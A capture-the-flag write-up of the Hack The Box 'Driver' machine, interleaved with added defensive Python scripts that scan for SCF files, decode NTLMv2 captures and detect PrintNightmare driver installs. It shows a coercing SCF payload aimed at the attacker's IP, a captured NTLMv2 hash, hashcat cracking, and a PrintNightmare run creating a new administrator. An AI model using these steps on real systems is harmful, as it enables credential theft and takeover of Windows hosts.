/ HACKTHEBOX, CTF, EASY

Driver Write Up

[image: cover]

Overview

Driver is an easy box from Hack The Box. It demonstrates the impact of the Windows PrintNightmare vulnerability, and I also learnt about SCF files, which were a new attack vector for me.

Nmap

I deployed the machine and was given the target IP 10.10.11.106. I started an Nmap scan to check the available ports.

└──╼ $sudo nmap -sC -sV -oA nmap/initial 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:20 GMT
Nmap scan report for 10.10.11.106
Host is up (0.020s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-28T00:20:49
|_  start_date: 2022-02-27T04:55:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.89 seconds

Three ports open:

  • 80 - HTTP - Microsoft IIS httpd 10.0
  • 135 - MSRPC - Microsoft Windows RPC
  • 445 - SMB - Microsoft Windows 7 - 10 microsoft-ds

I also ran a full port scan and found WinRM to be open on port 5985.

└──╼ $sudo nmap -p- -oA nmap/all_ports 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:25 GMT
Nmap scan report for 10.10.11.106
Host is up (0.026s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5985/tcp open  wsman

The web service returns an unauthorized response; however, it could be leaking a username, since the message reads "Please enter password for admin".

Enumeration

Before looking at the web service I tried enumerating SMB with various tools such as smbmap, smbclient and CrackMapExec, but I had no joy.

└──╼ $cme smb 10.10.11.106
SMB         10.10.11.106    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
┌─[daz@parrotos]─[~/Documents/HackTheBox/Driver]
└──╼ $smbmap -H 10.10.11.106
[!] Authentication error on 10.10.11.106

So I turned my attention to the web service. Navigating to the IP, I got a login prompt. I tried admin:admin and got in!

[image: login]

Once logged in, I got a simple web page, but it did show an email address, 'support@driver.htb'. I added 'driver.htb' to my hosts file just in case I need it later.

[image: homepage]

The only link that works on the web page is 'Firmware Updates'. This page provides an upload function. I played around with this for a long time, trying attacks like XSS and uploading PHP shells, but nothing worked.

[image: upload]

However, re-reading the line:

Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

I decided to change my Google search to "http smb file share exploit" and found an article on using SCF files.

Initial Access

The first article that came back was from Penetration Testing Lab, https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/. After reading the article I created the file test.scf using the example they provide and changed the IP to my VPN IP.

└──╼ $cat test.scf 
[Shell]
Command=2
IconFile=\\10.10.14.11\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
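From the defender's side, the thing to catch is an SCF file whose IconFile points at a UNC path on a host you do not control: when a user browses the folder, Explorer fetches that icon over SMB and authenticates on the way. The scanner below is an added example (not code from the write-up or from the Penetration Testing Lab article); it parses the INI-like SCF format, flags remote IconFile entries whose host is not on an allow-list, and runs over a directory such as the firmware upload share. The allow-listed host name and the sample files are constructed for the example; test.scf mirrors the file shown above.

```python
"""Flag SCF files whose IconFile points at a remote UNC path.

Added example (not from the original write-up): a check a defender might run
over an upload directory or an SMB share to catch SCF files like the one above
before a user browses the folder and Explorer fetches the icon over SMB.
"""
import re
import tempfile
from pathlib import Path

# UNC path: \\host\share\... (host may be an IP or a name)
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

# Hosts from which icon fetches are expected; anything else is flagged.
# Constructed allow-list for this example.
TRUSTED_HOSTS = {"fileserver.driver.htb"}

# Constructed samples: the SCF from the write-up, the stock "Show Desktop"
# shortcut (local icon), and one pointing at the allow-listed host.
MALICIOUS_SCF = r"""[Shell]
Command=2
IconFile=\\10.10.14.11\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
"""
BENIGN_SCF = r"""[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
"""
TRUSTED_SCF = r"""[Shell]
Command=2
IconFile=\\fileserver.driver.htb\icons\printer.ico
"""
SAMPLES = {"test.scf": MALICIOUS_SCF, "Show Desktop.scf": BENIGN_SCF, "intranet.scf": TRUSTED_SCF}


def parse_scf(text):
    """Parse the INI-like SCF format into {section: {key: value}} (lower-cased)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def scf_findings(text):
    """Return the reasons this SCF content is suspicious (empty list if clean)."""
    findings = []
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_RE.match(icon)
    if match:
        host = match.group(1).lower()
        if host not in TRUSTED_HOSTS:
            findings.append(f"IconFile uses a UNC path to untrusted host {host}: {icon}")
    return findings


def scan_directory(root):
    """Scan *.scf files under root; return {path: findings} for flagged files."""
    flagged = {}
    for path in Path(root).rglob("*.scf"):
        findings = scf_findings(path.read_text(errors="replace"))
        if findings:
            flagged[str(path)] = findings
    return flagged


def demo():
    """Write the constructed samples to a temp dir, scan it, key results by file name."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, content in SAMPLES.items():
            Path(tmp, name).write_text(content)
        return {Path(p).name: f for p, f in scan_directory(tmp).items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings)
```

Only test.scf is reported; the stock Show Desktop shortcut uses a local icon and the allow-listed host is accepted. An upload handler can call scf_findings on the uploaded content before writing it to the share, and blocking outbound SMB (445) from workstations to the internet is what stops the authentication from leaving the network in the first place.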

I started Responder with the command 'sudo responder -I tun0'.

Then I uploaded the file using the web upload function and got a hit from Responder:

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:87ea6d299d14fa32:ED6355EFB0444E974805B3FF0E0B9B26:0101000000000000803021AB042CD801AE67B0D5B0D050060000000002000800350054003400480001001E00570049004E002D00350032003700430037004C004F004F0030004300360004003400570049004E002D00350032003700430037004C004F004F003000430036002E0035005400340048002E004C004F00430041004C000300140035005400340048002E004C004F00430041004C000500140035005400340048002E004C004F00430041004C0007000800803021AB042CD80106000400020000000800300030000000000000000000000000200000C974CDC12A32C5BFD81B375A1DECF3BF2FF300E27CB3440A6AC953C7F84AACEA0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003100000000000000000000000000
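A capture line like this carries more than a crackable hash. The long hex field is the NTLMv2 client challenge blob from MS-NLMP: a FILETIME timestamp, the client's 8-byte challenge, and a list of AV_PAIRs that includes the names the client was handed in the server's CHALLENGE message and, in MsvAvTargetName, the service the client believed it was authenticating to. An analyst reviewing Responder output during an assessment, or triaging a suspected coercion incident, can read all of that without cracking anything. The decoder below is an added example, not part of the write-up or of Responder; the only input is the capture above, re-joined across the wrapped lines.

```python
"""Decode the fields of a Responder NTLMv2-SSP capture line.

Added example, not part of the original write-up. The layout of the
NTLMv2 response (NTLMv2_CLIENT_CHALLENGE and AV_PAIR) is documented in
MS-NLMP; this script only parses metadata and performs no cracking.
"""
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR ids from MS-NLMP section 2.2.2.1
AV_NAMES = {
    1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
    4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags",
    7: "MsvAvTimestamp", 8: "MsvAvSingleHost", 9: "MsvAvTargetName",
    10: "MsvAvChannelBindings",
}
UTF16_IDS = {1, 2, 3, 4, 5, 9}

# The capture from the write-up above, re-joined across the wrapped lines.
CAPTURE = (
    "tony::DRIVER:87ea6d299d14fa32:ED6355EFB0444E974805B3FF0E0B9B26:"
    "0101000000000000803021AB042CD801AE67B0D5B0D050060000000002000800350054003400480001001E00570049004E002D0"
    "0350032003700430037004C004F004F0030004300360004003400570049004E002D00350032003700430037004C004F004F003000430036002E0035005400340048002E004C004F00430041004C000300140035005400340048002E004C004F004"
    "30041004C000500140035005400340048002E004C004F00430041004C0007000800803021AB042CD80106000400020000000800300030000000000000000000000000200000C974CDC12A32C5BFD81B375A1DECF3BF2FF300E27CB3440A6AC953C"
    "7F84AACEA0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003100000000000000000000000000"
)


def filetime_to_datetime(raw8):
    """Convert a little-endian Windows FILETIME (100 ns ticks since 1601) to UTC."""
    ticks = struct.unpack("<Q", raw8)[0]
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)


def parse_av_pairs(data):
    """Walk the AV_PAIR list: uint16 id, uint16 length, value; id 0 (MsvAvEOL) ends it."""
    pairs, pos = {}, 0
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if av_id == 0:
            break
        value = data[pos:pos + av_len]
        pos += av_len
        if av_id in UTF16_IDS:
            value = value.decode("utf-16-le")
        elif av_id == 7:
            value = filetime_to_datetime(value).isoformat()
        elif av_id == 6:
            value = struct.unpack("<I", value)[0]
        else:
            value = value.hex()
        pairs[AV_NAMES.get(av_id, f"Unknown({av_id})")] = value
    return pairs


def decode_capture(line):
    """Split user::domain:serverchallenge:NTProofStr:blob and decode the blob."""
    user, _, domain, server_challenge, ntproofstr, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE: RespType(1) HiRespType(1) Reserved(6)
    # TimeStamp(8) ClientChallenge(8) Reserved(4) AvPairs...
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge,
        "ntproofstr": ntproofstr,
        "resp_type": (blob[0], blob[1]),
        "timestamp": filetime_to_datetime(blob[8:16]).isoformat(),
        "client_challenge": blob[16:24].hex(),
        "av_pairs": parse_av_pairs(blob[28:]),
    }


if __name__ == "__main__":
    for key, value in decode_capture(CAPTURE).items():
        print(f"{key}: {value}")
```

Two fields are worth a look: MsvAvTargetName decodes to cifs/10.10.14.11, the UNC host from the SCF, which is exactly the evidence a blue team wants when deciding whether a captured authentication was coerced; and the NetBIOS and DNS names are whatever the responding server put in its CHALLENGE message, so in this capture they describe Responder's spoofed identity rather than the real DRIVER host.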

I put the hash into a file called 'hash' and used hashcat to crack it with the command hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt.

Now that I had a username and password, I was able to log in over WinRM. To do so I used Evil-WinRM.

└──╼ $/opt/evil-winrm/evil-winrm.rb -u tony -i 10.10.11.106
Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> 

Priv Esc

Now that I had a foothold, I did some basic enumeration of the box. Looking at the running services I could see the Windows Print Spooler service (spoolsv).

    381      23     5164      14448 ...12            1128 spoolsv

This made me think of the PrintNightmare exploit. I could also have used rpcdump to find this.

└──╼ $rpcdump.py 10.10.11.106 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol 

To exploit this I used the exploit created by Caleb Stewart and John Hammond.

I used git to clone the repo into my /opt directory.

└──╼ $sudo git clone https://github.com/calebstewart/CVE-2021-1675.git
Cloning into 'CVE-2021-1675'...
remote: Enumerating objects: 40, done.
remote: Counting objects: 100% (40/40), done.
remote: Compressing objects: 100% (32/32), done.
remote: Total 40 (delta 9), reused 37 (delta 6), pack-reused 0
Receiving objects: 100% (40/40), 131.12 KiB | 932.00 KiB/s, done.
Resolving deltas: 100% (9/9), done.
┌─[daz@parrotos]─[/opt]
└──╼ $cd CVE-2021-1675
┌─[daz@parrotos]─[/opt/CVE-2021-1675]
└──╼ $ls
CVE-2021-1675.ps1  nightmare-dll  README.md

Now, using Evil-WinRM, I can upload the PowerShell script and execute it.

*Evil-WinRM* PS C:\Users\tony\Documents> upload /opt/CVE-2021-1675/CVE-2021-1675.ps1
Info: Uploading /opt/CVE-2021-1675/CVE-2021-1675.ps1 to C:\Users\tony\Documents\CVE-2021-1675.ps1

                                                             
Data: 238080 bytes of 238080 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\tony\Documents> Import-Module C:\Users\tony\Documents\CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
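The exploit output above is also a good description of what to detect: the spooler is made to install a "driver" whose files live outside the Windows driver store (here, a DLL dropped in the user's Temp directory alongside the legitimate mxdwdrv.dll path), and the payload then adds a new local administrator. On Windows the driver installation is recorded in the Microsoft-Windows-PrintService/Operational log as event 316 (printer driver added or updated, with the file list), and the group change in the Security log as event 4732 (member added to a security-enabled local group). The detection below is an added example, not from the write-up or the exploit repository; it runs over constructed JSON-lines records with simplified field names (not a real event export format), flags driver installs that pull files from outside the driver directories, and raises the severity when an Administrators addition follows within a short window.

```python
"""Correlate print-driver installs with local Administrators additions.

Added example, not from the original write-up. Event ids 316
(PrintService/Operational) and 4732 (Security) are real Windows events; the
JSON record layout and the sample values are constructed for this example.
"""
import json
from datetime import datetime, timedelta

# Directories a legitimately installed driver's files should come from.
TRUSTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\driverstore\\filerepository\\",
    "c:\\windows\\system32\\spool\\drivers\\",
)
WINDOW = timedelta(minutes=10)

# Constructed JSON-lines sample. The paths mirror the exploit output above:
# a benign install, an install that also loads a DLL from %TEMP%, the
# resulting Administrators addition, and an unrelated group change later.
SAMPLE_LOG = r"""
{"time": "2022-02-27T18:40:02", "channel": "Microsoft-Windows-PrintService/Operational", "id": 316, "driver": "BenignDriver", "files": ["C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_f66d9eed7e835e97\\Amd64\\mxdwdrv.dll"]}
{"time": "2022-02-27T18:41:10", "channel": "Microsoft-Windows-PrintService/Operational", "id": 316, "driver": "ExampleDriver", "files": ["C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_f66d9eed7e835e97\\Amd64\\mxdwdrv.dll", "C:\\Users\\tony\\AppData\\Local\\Temp\\nightmare.dll"]}
{"time": "2022-02-27T18:41:11", "channel": "Security", "id": 4732, "group": "Administrators", "member": "adm1n"}
{"time": "2022-02-27T19:30:00", "channel": "Security", "id": 4732, "group": "Remote Desktop Users", "member": "svc_scan"}
"""


def load_events(text):
    """Parse JSON-lines into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_outside_driver_dirs(path):
    """True when a driver file path is not under one of the trusted directories."""
    return not path.lower().startswith(TRUSTED_DRIVER_DIRS)


def detect(events):
    """Alert on event 316 installs with files outside the driver directories.

    Severity is 'medium' on its own and 'high' when a Security 4732 adding a
    member to Administrators occurs within WINDOW after the install.
    """
    events = sorted(events, key=lambda e: e["time"])
    admin_adds = [
        e for e in events
        if e["channel"] == "Security" and e["id"] == 4732
        and e["group"].lower() == "administrators"
    ]
    alerts = []
    for e in events:
        if e["id"] != 316 or not e["channel"].endswith("PrintService/Operational"):
            continue
        bad_files = [f for f in e["files"] if is_outside_driver_dirs(f)]
        if not bad_files:
            continue
        installed_at = datetime.fromisoformat(e["time"])
        alert = {"time": e["time"], "driver": e["driver"], "files": bad_files,
                 "severity": "medium", "member": None}
        for add in admin_adds:
            added_at = datetime.fromisoformat(add["time"])
            if installed_at <= added_at <= installed_at + WINDOW:
                alert["severity"] = "high"
                alert["member"] = add["member"]
                break
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_LOG)):
        print(alert)
```

Two caveats for anyone wiring this into a SIEM: the PrintService/Operational log is not enabled by default, so event 316 will not exist until it is switched on, and the 4732 correlation only raises severity, since the driver install with an out-of-place DLL is suspicious on its own. The corresponding hardening is to keep the spooler disabled where it is not needed and to set RestrictDriverInstallationToAdministrators under the PointAndPrint policy key, as Microsoft's PrintNightmare guidance describes.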

It worked! I canceled my current WinRM session and logged back in using the new credentials.

*Evil-WinRM* PS C:\Users\tony\Documents> exit

Info: Exiting with code 0

┌─[daz@parrotos]─[~/Documents/HackTheBox/Driver]
└──╼ $/opt/evil-winrm/evil-winrm.rb -u adm1n -i 10.10.11.106
Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\adm1n\Documents> cd C:/Users/Administrator/Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/26/2022   8:56 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

That's the box, thanks for reading!

==========================================================================

Any comments or feedback welcome! You can find me on Twitter.
